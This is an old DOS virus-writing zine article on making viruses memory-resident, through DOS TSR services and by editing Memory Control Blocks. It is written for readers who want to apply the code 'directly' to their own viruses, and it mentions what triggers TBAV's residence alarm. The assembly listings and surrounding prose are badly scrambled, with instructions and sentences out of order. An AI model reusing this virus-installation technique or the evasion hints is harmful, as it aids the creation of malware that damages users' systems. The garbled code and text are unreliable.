Memory Residence Methods.

----------------------------------------------------------------In this article, I'll try to explain the more common methods
used to make viruses go resident. The focus will be more on the
practical than the theoretical, leaving clear the fundamentals so
that you can take advantage of them, especially in the case of the
MCB. The article will show examples of the two techniques
described which can (in the case of the MCB) be directly applied to
your own viruses. The theory is not very detailed, but everything
a beginner needs to know to use these methods is present. With the
information the article provides, the beginner who wishes to get
deeper into the theory can simply read a guide or manual on memory
residence, since the necessary basics are explained here (I hope).
Let's begin:
The most used methods to make a virus go resident are:
those available through DOS or
the MCB (Memory Control Block) method.
The former is the simplest way to do it, but also the most
inefficient because it informs DOS it's leaving something behind in
memory. Besides, when you execute this function, control is
returned to DOS. Whatever program you attempt to run will
terminate! The virus which uses this technique must re-execute
itself to avoid exiting to DOS during it's installation into
memory. To remain resident, it executes itself again (service 4bh)
and during it's second execution it hooks Int27h or calls service
31 of Int 21, in it's turn giving control to the "father" program
(the one loaded first). The father program can then end, executing
the host. If this isn't done (like when executing Int 21), control
would be passed to the command interpreter.
One characteristic of viruses which use this technique is that
they tend to attach to the beginning of the file; these services
will resident the amount of required from the beginning of the file
in memory.... If we have a 50K .COM and the virus is at the end,
and we use Int 27 to attempt to leave resident 1K, for example,
what would be placed in memory would be the first K of the COM, not
the virus. Obviously, we can't just leave 50K resident.... we can
make the virus go resident we can move (it?) to another block,
transfer control, and then this will give control to the "father"
program. To avoid all this, many viruses attach themselves to the
beginning of the programs they infect. Of course, this is slow,
since we have to read the whole file and copy it after the virus.
If the virus attaches to the end of the file, we only have to write
the virus, not the virus AND the file. This method is not very
elegant; more than just slow, other things can happen if the
infection places the virus at the beginning........
Below is the source to a TSR, NOT a virus, just a normal TSR to
illustrate how it works. This example hooks Int 21 and then passes
control without doing anything. Code can be added to make it do
what ever you want.
assume cs:code,ds:code
org 100h

offset new_21 int 21h .Jump to the original int. code ends end start =================================================================== =================================================================== The second method is a little more complex than simply calling Int 27h. old_21 dd 2 new_21: . we must subtract from that value the length of the virus. jmp cs:[old_21] .Number of paragraphs(16 bytes) .2521h push cs pop ds mov dx.routine. When we mark the block we use an '8' to identify it because DOS uses the same. The code that follows shows how it's done. =================================================================== =================================================================== .<--------. not CS.1 contains the address of this block. 31h dx. To understand how it works.. 30d 21h .start: jmp instalar . to fool DOS into not using that part of memory. mov ax.Set the new Int 21 vector. instalar: . es .leave resident. This control block is 16 bytes long (a paragraph)and is just above the assigned memory block. In offset 3 of the same we can find the amount of memory used by the program.We put the original Int21 address in this variable. In a COM file.. for example. and assign it to our program (service 48h). We finish by marking the MCB of the segment to which we moved our virus with '8' in offset 1.Now it's mov mov int resident ah. CS . you must be aware that DOS creates a control block for each memory block used. the code will leave a virus resident from a COM file.Here's the routine which hooks Int 21. free up the memory which is no longer used (service 4ah).Jump to the installation . but it's much more effective.... bx mov word ptr old_21+2.. 3521h int 21h mov word ptr old_21. To load a virus from an EXE we must keep in mind that the MCB segment to be modified is obtained by subtracting 1 from DS. To make our program resident. .Obtain the original Int 21 Vector mov ax..

Pass the new amount to BX. mov and place the result in AX sub ax.points to the memory the virus will use. the assigned memory segment .which is in AX. ax push es . ax mov ax. push cs pop es mov ah..'XX' ax es.. .Optional: name that block. 8 word ptr es:[8]. 4ah int 21h . NOTE: The routine by itself does not set off any alarms. dec mov mov mov inc mov ax es.BX contains the length of the virus .I assign the freed memory to my virus. mov es.Pop the amount of memory to be reserved.Save the address of the virus . I then increment AX again and pass it to ES.memory. bx . ax word ptr es:[1]. ...segment in ES.. that way I point to the paragraph .I pass the code segment to AS.With this we obtain the MCB segment. the virus is resident.I subtract the length of the virus from the memory used by the . ax ...I decrease AX and pass it to ES. es:[3] . pop dec mov int bx bx that DOS thinks it's a part of itself and not use this part of . .DOS uses as a control.goes to AX. push bx . I mark the paragraph at offset 1 with an 8 . 48h 21h . so that ES .Save the amount of memory to be reserved mov bx. cs dec ax . with the new size and the .We pass the result of the previous operation to BX so as to then .Here we obtain from the MCB the .segment.obtain the amount of memory reserved by the host program (ES:[3]). I decrease BX because DOS will use one paragraph.amount of memory used. a simple matter of doing a "rep movsb" to the segment to which ES points and that's paragraphs . . TBAV's residence alarm is set off when it detects a hook to Int 21h or .call the service which frees memory. =================================================================== =================================================================== All that remains is to move the virus to the reserved segment. I subtract it and pass to ES to .

Text by Zarathustra for Minotauro Magazine .13h.